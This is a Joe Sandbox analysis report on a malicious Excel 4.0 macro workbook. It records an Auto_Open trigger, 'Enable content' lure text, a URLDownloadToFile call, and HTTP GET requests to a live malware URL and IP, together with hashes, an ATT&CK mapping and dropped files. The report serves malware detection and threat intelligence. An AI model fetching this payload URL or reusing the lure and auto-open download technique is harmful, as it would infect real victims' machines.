Loading ...

Play interactive tourEdit tour

Analysis Report Documents_1605962083_895739149.xlsm

Overview

General Information

Sample Name:Documents_1605962083_895739149.xlsm
Analysis ID:382679
MD5:77941203a3ef209ec6b53d47f0b6d5c0
SHA1:a2c4f211a8007a6c1def18ab10722edd235a5a70
SHA256:05ec137601fe0cb3bb5605a55df59e9e03cff966b43e545910cd12030bfca456
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Found Excel 4.0 Macro with suspicious formulas
Excel documents contains an embedded macro which executes code when the document is opened
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2492 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://sankhyasol.com/field.phpAvira URL Cloud: Label: malware
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
Source: global trafficDNS query: name: sankhyasol.com
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 148.66.138.148:80
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 148.66.138.148:80
Source: Joe Sandbox ViewIP Address: 148.66.138.148 148.66.138.148
Source: global trafficHTTP traffic detected: GET /field.php HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sankhyasol.comConnection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6F6F568D.pngJump to behavior
Source: global trafficHTTP traffic detected: GET /field.php HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sankhyasol.comConnection: Keep-Alive
Source: unknownDNS traffic detected: queries for: sankhyasol.com

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable Editing U the decryption of the document. U SecurityWarning Macros have been disabled. E
Source: Screenshot number: 4Screenshot OCR: Enable content" to oerform M"crosoft Off"ce Decrvot"on Core to start V Q R S m' ^ Enable Editing
Source: Document image extraction number: 2Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet. Protected View This fi
Source: Document image extraction number: 2Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Source: Document image extraction number: 3Screenshot OCR: Enable Content
Source: Document image extraction number: 4Screenshot OCR: Enable Editing
Source: Document image extraction number: 13Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. Protected View This fi
Source: Document image extraction number: 13Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: Documents_1605962083_895739149.xlsmInitial sample: CALL
Source: Documents_1605962083_895739149.xlsmInitial sample: CALL
Source: workbook.xmlBinary string: " sheetId="1" r:id="rId1"/><sheet name="Docs1" sheetId="2" r:id="rId2"/><sheet name="Docs2" sheetId="3" r:id="rId3"/><sheet name="Docs3" sheetId="4" r:id="rId4"/><sheet name="Docs4" sheetId="5" r:id="rId5"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">Docs2!$BA$11</definedName></definedNames><calcPr calcId="0"/></workbook>
Source: classification engineClassification label: mal64.expl.evad.winXLSM@1/13@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Documents_1605962083_895739149.xlsmJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCC43.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Documents_1605962083_895739149.xlsmInitial sample: OLE zip file path = xl/media/image5.png
Source: Documents_1605962083_895739149.xlsmInitial sample: OLE zip file path = xl/media/image6.png
Source: Documents_1605962083_895739149.xlsmInitial sample: OLE zip file path = xl/media/image4.png
Source: Documents_1605962083_895739149.xlsmInitial sample: OLE zip file path = xl/media/image2.png
Source: Documents_1605962083_895739149.xlsmInitial sample: OLE zip file path = xl/media/image3.png
Source: Documents_1605962083_895739149.xlsmInitial sample: OLE zip file path = xl/media/image1.png
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting11Path InterceptionPath InterceptionMasquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Scripting11Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://sankhyasol.com/field.php100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
sankhyasol.com
148.66.138.148
truefalse
    unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://sankhyasol.com/field.phptrue
    • Avira URL Cloud: malware
    unknown

    Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public

    IPDomainCountryFlagASNASN NameMalicious
    148.66.138.148
    sankhyasol.comSingapore
    26496AS-26496-GO-DADDY-COM-LLCUSfalse

    General Information

    Joe Sandbox Version:31.0.0 Emerald
    Analysis ID:382679
    Start date:06.04.2021
    Start time:13:49:51
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 4m 28s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:Documents_1605962083_895739149.xlsm
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes analysed:4
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal64.expl.evad.winXLSM@1/13@1/1
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    • Found application associated with file extension: .xlsm
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer
    Warnings:
    Show All
    • Exclude process from analysis (whitelisted): dllhost.exe
    • Report size getting too big, too many NtCreateFile calls found.
    • Report size getting too big, too many NtQueryAttributesFile calls found.

    Simulations

    Behavior and APIs

    No simulations

    Joe Sandbox View / Context

    IPs

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    148.66.138.148Documents_1713907124_2018691726.xlsmGet hashmaliciousBrowse
    • sankhyasol.com/field.php
    Documents_1713907124_2018691726.xlsmGet hashmaliciousBrowse
    • sankhyasol.com/field.php
    Documents_1218377412_1143987592.xlsmGet hashmaliciousBrowse
    • sankhyasol.com/field.php
    Documents_1218377412_1143987592.xlsmGet hashmaliciousBrowse
    • sankhyasol.com/field.php
    1569--1569.docGet hashmaliciousBrowse
    • sankhyasol.com/field.php
    Documents_946716203_1131387427.xlsmGet hashmaliciousBrowse
    • sankhyasol.com/field.php
    Documents_946716203_1131387427.xlsmGet hashmaliciousBrowse
    • sankhyasol.com/field.php
    Documents_605342363_1447667318.xlsmGet hashmaliciousBrowse
    • sankhyasol.com/field.php
    Documents_1760959998_1062944183.xlsmGet hashmaliciousBrowse
    • sankhyasol.com/field.php
    Documents_1760959998_1062944183.xlsmGet hashmaliciousBrowse
    • sankhyasol.com/field.php

    Domains

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    sankhyasol.comDocuments_1713907124_2018691726.xlsmGet hashmaliciousBrowse
    • 148.66.138.148
    Documents_1713907124_2018691726.xlsmGet hashmaliciousBrowse
    • 148.66.138.148
    Documents_1218377412_1143987592.xlsmGet hashmaliciousBrowse
    • 148.66.138.148
    Documents_1218377412_1143987592.xlsmGet hashmaliciousBrowse
    • 148.66.138.148
    1569--1569.docGet hashmaliciousBrowse
    • 148.66.138.148
    Documents_946716203_1131387427.xlsmGet hashmaliciousBrowse
    • 148.66.138.148
    Documents_946716203_1131387427.xlsmGet hashmaliciousBrowse
    • 148.66.138.148
    Documents_605342363_1447667318.xlsmGet hashmaliciousBrowse
    • 148.66.138.148
    Documents_1760959998_1062944183.xlsmGet hashmaliciousBrowse
    • 148.66.138.148
    Documents_1760959998_1062944183.xlsmGet hashmaliciousBrowse
    • 148.66.138.148

    ASN

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    AS-26496-GO-DADDY-COM-LLCUSPowerShell_Input.ps1Get hashmaliciousBrowse
    • 166.62.10.32
    TT Swift Copy.pdf.exeGet hashmaliciousBrowse
    • 43.255.154.56
    RFQ-V-SAM-0321D056-DOC.exeGet hashmaliciousBrowse
    • 184.168.131.241
    1517679127365.exeGet hashmaliciousBrowse
    • 184.168.131.241
    TT COPY.exeGet hashmaliciousBrowse
    • 50.62.198.97
    Documents_1713907124_2018691726.xlsmGet hashmaliciousBrowse
    • 148.66.138.148
    Documents_1713907124_2018691726.xlsmGet hashmaliciousBrowse
    • 148.66.138.148
    sample.exeGet hashmaliciousBrowse
    • 184.168.131.241
    Shinshin Machinery.exe.exeGet hashmaliciousBrowse
    • 184.168.131.241
    Documents_1218377412_1143987592.xlsmGet hashmaliciousBrowse
    • 148.66.138.148
    Documents_1218377412_1143987592.xlsmGet hashmaliciousBrowse
    • 148.66.138.148
    1569--1569.docGet hashmaliciousBrowse
    • 148.66.138.148
    Documents_946716203_1131387427.xlsmGet hashmaliciousBrowse
    • 148.66.138.148
    Documents_946716203_1131387427.xlsmGet hashmaliciousBrowse
    • 148.66.138.148
    Documents_605342363_1447667318.xlsmGet hashmaliciousBrowse
    • 148.66.138.148
    Documents_1760959998_1062944183.xlsmGet hashmaliciousBrowse
    • 148.66.138.148
    Documents_1760959998_1062944183.xlsmGet hashmaliciousBrowse
    • 148.66.138.148
    Sample.docGet hashmaliciousBrowse
    • 166.62.10.32
    Sample.docGet hashmaliciousBrowse
    • 166.62.10.32
    Payment Advice.pdf.exeGet hashmaliciousBrowse
    • 43.255.154.56

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Created / dropped Files

    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\27FB0E16.png
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 30 x 29, 8-bit/color RGB, non-interlaced
    Category:dropped
    Size (bytes):1713
    Entropy (8bit):7.854768499116331
    Encrypted:false
    SSDEEP:24:FcAKxKrdxqpAJ4fcYfelzT7uK5CVPi96gKDEc6V9uMH6DBUBcfCfahijedWg:6AKxKzYFcqejwVe6nDEc6gBo4Dlkg
    MD5:745E9775F9F61C9BFC2D13AA3AB16A2A
    SHA1:E9EB42E8723A4112722AFAD0A889FA9468168C78
    SHA-256:E31538CF9239944E7C174D50FB6C75CC042D13594A79F69DF2DA97874241D7EA
    SHA-512:B4EFEE949211CD71AF1074515B932E2AA3D894F3C53D493B15BD2C9B582013DD5F52D59278B077799C98F09C27228CA87D3AC130697C02C5E02117108C9F486A
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview: .PNG........IHDR.............2.K[....sRGB.........pHYs..........+.....VIDATHK.V.S.g...f7......H@@9.....0Z..NU.Z...Z.....v:VG....."..A...A..D.A.r...KhDD.df..{..}..[Z.ej...v.=.n...a.C..<.....?..v:G..:..G...<...4.....++...x.......q.....h....q;......14-Q...sr6.*MV+._....`7..qw......r..-J..D7.M3..L.j..ZP.o.....,..-h...j......6..A..,..!...\..pD.+h...F..,*.)+7Z..6.`.:.."..w...w...Ae....@../.H.MQ...5.._.A.............J.3.Y....S..l[.......,......"L...I....h.SS4...ffF.....K-I.dY..._a+.Og0.h0...G....B(X.J.&..hK..|D.cj..H......r..G.C....D1..L.J.....8......."d.$L.2..2...y....=..Q...a..S^Qr..mddOc#.CQb9@X.GC9....f9....4.[..6.n.U................t......[6n......d9.f.Z....*.F...o.=n..........$.........l.]].....6.`@.....UkI...*^.Z.z.[(#I.i......JJ!.T..%MC}...9.........]...;9.*...%k..Y.&T.Ah.&..*5H.......!....p..'..K!(.(R..w.;fLME.@tt...(.Q.._.BhE..C.D.5.'Z,.......p.5...V..v............}n.X.!p.....\F4^.G..*N...8.........t..]0..(..?...R ..n.x}.II.}.......Zjj...).....*1...I...
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2D8C3523.png
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 264 x 113, 8-bit/color RGB, non-interlaced
    Category:dropped
    Size (bytes):9924
    Entropy (8bit):7.973758306371751
    Encrypted:false
    SSDEEP:192:soXrzGktAQUkDfw4om9PEK9u27pwnJyV028/tgXEoCWoB:so9G+fnVEYu27OIW/+XEoCWoB
    MD5:B34FB4F2F0F9E70B72BA3AFD028CD97C
    SHA1:C6868336F78DEA1E718965DF3341039581DB5B5A
    SHA-256:189D420D344A694FD1928ABACBEC94D9F0EF52BE036CEB8144A9D9A6DD14EAEB
    SHA-512:4795600917F8A67A6C5CBD5713CAACE74E0483F8E6BB6D98EAB63BF24A0F71E537E7F8ABD26808630B247D454A3F467595C8343EEB4EA98AFAB49D81964158D6
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview: .PNG........IHDR.......q............sRGB.........pHYs..........+....&iIDATx^.Wp.G~.{"r.. H.9s.,Q.v........\..../wu..t.o..ru...+W]....vWa).Q.b&.@d.D.q....{0....GB....8...........X,&L1.0...........b...0Xa ....a..0.0.ap.@......'.*. `.#.6.,....aX..i.b.0..b.n.k...0...J1...H..7...C...dZ....a....Z..!.kp2.R...0Rl..r.A...58.V)..C.)..f.. `....L....!...p.\k.0.a.N.U.A..F.m.Y.5....'.*. `.#.6.,....aX..i.b.0..b.n.k...0...J1...H..7...C...dZ....a....Z..!.kp2.R...0Rl..r.A...58.V)..C.)..f.. `....L....!...p.\k.0.a.N.U.A..F.m.Y.5....'.*. ..W[....cfTDC.....V.....W`...Q!.JEaE....5O.{\N.p8b.5.#*.t......^...p..A.+.0cC..(.v.,.............qO....-b.0.#l.......p...w...sN]m..-c.=....L....I..T...I.3....]...r.....Ae.H%..!......O...?-.I..".4...........p...{..0..#,..........%4.;E....w..]......ga...X....#...h@.'E.'.|...I.a..J..V...!...E..?8[CQ?.'...5Qy........X..)Y..ic 0....!..Gf..4...o.R../.^..y2.'..p.....KO..v.T....~.......-]"..u9Q..i..^e..!.i".^.......C.CKV..~Ku.4"m.$>cKP...x...7
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\39690E29.png
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 30 x 30, 8-bit/color RGB, non-interlaced
    Category:dropped
    Size (bytes):1792
    Entropy (8bit):7.852456323448507
    Encrypted:false
    SSDEEP:48:O2DcSOVqwOWO1TJT8/UGUsVMsZKRJzDeDI5hHFba:OudOVqwCpJ3GRvcJ3eOhFG
    MD5:FC475BA24ED6FFB08766AA076689DB6B
    SHA1:CED2C4B64F54E11D79190714331C52B5157B1429
    SHA-256:B0E239E6DD08FCB88CB5475DCAB60AD4EF32D16287C5734E93852162D82C405B
    SHA-512:B53D43F2B672080E313E159762A803896AC1AF8BD79325C11B736C1A47A3CAF62C40A7DA79C2CEB560BAE7D1A8F554E3E0EDD5B480A4E8F269A7CE5FC55B8477
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview: .PNG........IHDR..............R9.....sRGB.........pHYs..........+......IDATHK...SSW..s.ld!.DB..L.P...w.U..V..N........_.~.2N......h.nUPADG..E..FB..B....R........9.....!..MO2...7t..%....R]Y.V.o.."^..'.....t...........%.k...j5..,.Jt*........{..?.!.J.D.H..d1.l..*].\[.9n...A..4.t....ZO...")Z.+IP...B&I..(I..y..uM......9.......\..y../..U.v*.<..I.....eIR.....P.6.qU}....[...%Y..'.n>.|..._.....TE..I....)._.I.(F.A.eT9.V%e.=.M..q..{.. .M(.D".q......G.4. ).K....<.....b*....^_(..%Q...@4.$..r..6...wk4...u........pv......d.-..q.RG"....0..k.8......&.@g.Q4....XL./.o].^D.e2..%S.....CNHwE....h...../..`..v.,.....t.Lg.1......A.X".J).%.z..ch$....S...{[..x..9y.....t$...&...._...t<..;..<R.A.<XD...3h...V.h....vCs.?.>y.;.M.".....D..iX....v.#..k.,.PN.=/CQ..QT.C.X..G~q...{.O%2.*..4k6.>.../....t.-)...-YK...e(.V.RE.d3/7.nB.,...9.8.I..mip.4.1,g.?.z.e.....*....aWA..nU.N.b1...h5...J"3...g.^?A...l=......&.^...zS.........3.O..Q.1......**D.+.K.../,q@.X.......f....H.
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5DB5A4C8.png
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 178 x 76, 8-bit/color RGB, non-interlaced
    Category:dropped
    Size (bytes):5744
    Entropy (8bit):7.966496386988271
    Encrypted:false
    SSDEEP:96:4uJgumnoYk22FLjJq17cpKsv+CHI5BXjI1e+HCLDl3kjH1erj+uYU2:4CgJfkfJA7ixCxqe+GDhkT1erj+uYf
    MD5:9AD30E24270C495AE68EAF3A1EEECBFB
    SHA1:8642D256E7FFBEF5804A2D2220A1FE475A99DC36
    SHA-256:6D3EAD431ABD110369EFABC6F2E474DC24FA3D7EEC28DE43456407C5BACD6D20
    SHA-512:EB156DD0686BAAE4F46B0B0C01838DA7225529D3B31912568D36A1CC07BE006EEAD31F464B0252C3A8471ACA71E86EEE9185FE705ABAE08C56B15C63CC891AD5
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview: .PNG........IHDR.......L.....FpzV....sRGB.........pHYs..........+......IDATx^.\.tTU..u...@@. .b..su....."....+k..Aeu..rX.*.feE..(M.....b..BB.P.f&S_.~w&.I.aH...'...0..........u.2.!...`....8_..,.T.#....,.X...N....NN-l........5`...Z.,..-L..k.":9..Y.,Z..c.Etrja..X.0.G.......f..ha...]......2`.......,..S..e...)<:v.XD'..6.E.Sxt....NN-l........5`...Z.,..-L..k.":9..Yt......9.{.f;...f../Mh...B..GK.....FG.....s...MN.vqp"+.|.m[&11..<O....?...EQ4.H...Z'M... #.T......vS..^..p..)........1...JJr?.gq.V..X..h..T._Zr2g..W^...A./.W...P....q.By.49..5M--.e...5}..{.!.s4M./Xx2.....`...I>s..4U...]...(5.8o>.X.[..xS.w)../.c.Lh..a..uQ.fd.....jh.Z.d..(..=.....#.....o.y....g...-....=?..X.f./..=n|`.j..k.........{.4...b..T.-h..F..;u.x....[!.\....*'Nx^....C..b...8........|F.$.4.......&?.>#.d.\p.R..k..>t0?.-3g..b......s.O..E...4o...\O=.7O=z...u1$n..6..C.]A.X...Z.tX.......I..W.....P...h.@..+q..F.kcI..x\>.....0.4..p....}.~e...).w....%Q.$W......8........PY.k..J....T..b.l
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6F6F568D.png
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 288 x 77, 8-bit/color RGB, non-interlaced
    Category:dropped
    Size (bytes):23989
    Entropy (8bit):7.989754044300238
    Encrypted:false
    SSDEEP:384:SGjFc9Ll+HCggc/h3GXoQjZVVawDIPsTDGY9R9cNc+3JY0kEtWhfEWa92ppgMoF3:S5plMCgzGoOzVawisTDGY9Rs3JYhEtqy
    MD5:839795652A8FE78F26F4D86D757ABDE8
    SHA1:979E5B90C72EA3E5E9D9B506AFDC981BFCA61B60
    SHA-256:1A9EF0E2F66682B532D15457635920067C4F29EF762D2E8A3E0363B4CF39C13E
    SHA-512:E6D5CB06679832DE768E23EF42B9780E4E8327A057A3EA0A6CD5B76908B210078EF659CA44C8723960AB59A0DB85A052C45E7A29D7FA8A643275BA5F210F6773
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview: .PNG........IHDR... ...M.............sRGB.........pHYs..........+....]ZIDATx^.......{fs..|.S........d....`...9.....8..6/.......E.BB.....yw..w.-.FF.g.5~5..ivv.'..U.Tu..8.../=..R9s.Rn....Ry.....@..V.m).bCU..n....Ue.,~b;K.Q.KUlUR.`../...:.Y.Jy..Jy8.Q.K..Xzg..a.Y....X[...s.........`...Q1b....*.......|e.a..$..(...e....e.e..i$SQ.i.y....o.@......p..yx.b.~....Z"..Xc{,..{..o....`...9K..;........=...%.@]? .h!.......W...Z....T.Uul..V..PS[.j.......,..W...T.Z..e..T*.J)..+.K*Wt......W.].K..4......{.<)...V+e....u.I..A...`o..w.....jUU...b...'....EW....R\..'..b......U.X..SKV..O&..?.).....}._....\....*..hU\..W.m.I..|.0\...o..?c.a3'.2}...u....`.9..*....q.dc....!..vq..B...9....&..rsJ.\...)..}.W./.._.g.5e....sy.......@I.l.J.UgW...q..o9^O.g;V.r*v...U.0..._?.5|...x...m..Z....6...._..l.....dc......K..`U.c+;.K.^...`.L....j:W(...fuB=.p..w=..D....q..&..8.V.....UU.b#z...Xyo..X...*...w..U.....sW2...d.u.~.~..)l....e.q.:#r.f.....m|...w_...1.i..bs.F..L.`.}..6V..w.....z
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6F827B1F.emf
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
    Category:dropped
    Size (bytes):1108
    Entropy (8bit):1.9788140868910489
    Encrypted:false
    SSDEEP:12:YnnuO0plqHuThp0FIISFk1EV/iztLAcqdIgDWWkMXNuivnAf:Ynu5OHI0xywLwLpnQ
    MD5:0D94E1177F230340FF5F1363B68ADA08
    SHA1:67ABCEE0528F44BA1B6EB50EC4ADA8F5E6C7E1FC
    SHA-256:AB58818AE1864807B22F8A58A75F7FA8703ECB19A2352BDB47469F366B868E59
    SHA-512:4EA5FE6A5DCC88F155D961D6DEF32FE649F7546AB0C4A2148547500DEAAFEEE9B06E60DAA8397B92AACE1B21234844121DA1DBC61EA06C85C2408FE60121A4EC
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview: ....l................................... EMF....T...........................8.......................H...0]..F...........GDIC.........XS...............d.....................................................ddd.......-.........!.................!.................!.................!.............................-.........!...............'.....................................................................................!.......'...............ddd.....%...........L...d...................................!..............?...........?................................L...d...................................!..............?...........?................................L...d...................................!..............?...........?................................L...d...................................!..............?...........?................................'.......................%...........L...d...................................!..............?...........?................................
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\78E8932A.png
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 168 x 72, 8-bit/color RGB, non-interlaced
    Category:dropped
    Size (bytes):6177
    Entropy (8bit):7.959095006853368
    Encrypted:false
    SSDEEP:96:j6KDvZ3QXkQ288GMDBm6hEeWyS8ITRIVg9gPEnbYhbY0Y4pxCpAueydMT1uZMr0a:j6KTV8WBPhqd9qqYTB6peyeT1oMr0a
    MD5:C7ED6FC355D8632DB1464BE3D56BF5CC
    SHA1:615484A338922DDF00B903CFA48060AD60D70207
    SHA-256:26000244FBB0C6B2D76F80166CE85700BC96141C6CD80F8B399CA6F15FE3515C
    SHA-512:FB4AE09EACD15A4FE778BDF366808C4F9FE403C4054F86704C03C87C7016E7D7A5772677B69064FCB5F1B9345D80C4263A58EA8B5E9CA2B717E24E2B19B85A92
    Malicious:false
    Reputation:moderate, very likely benign file
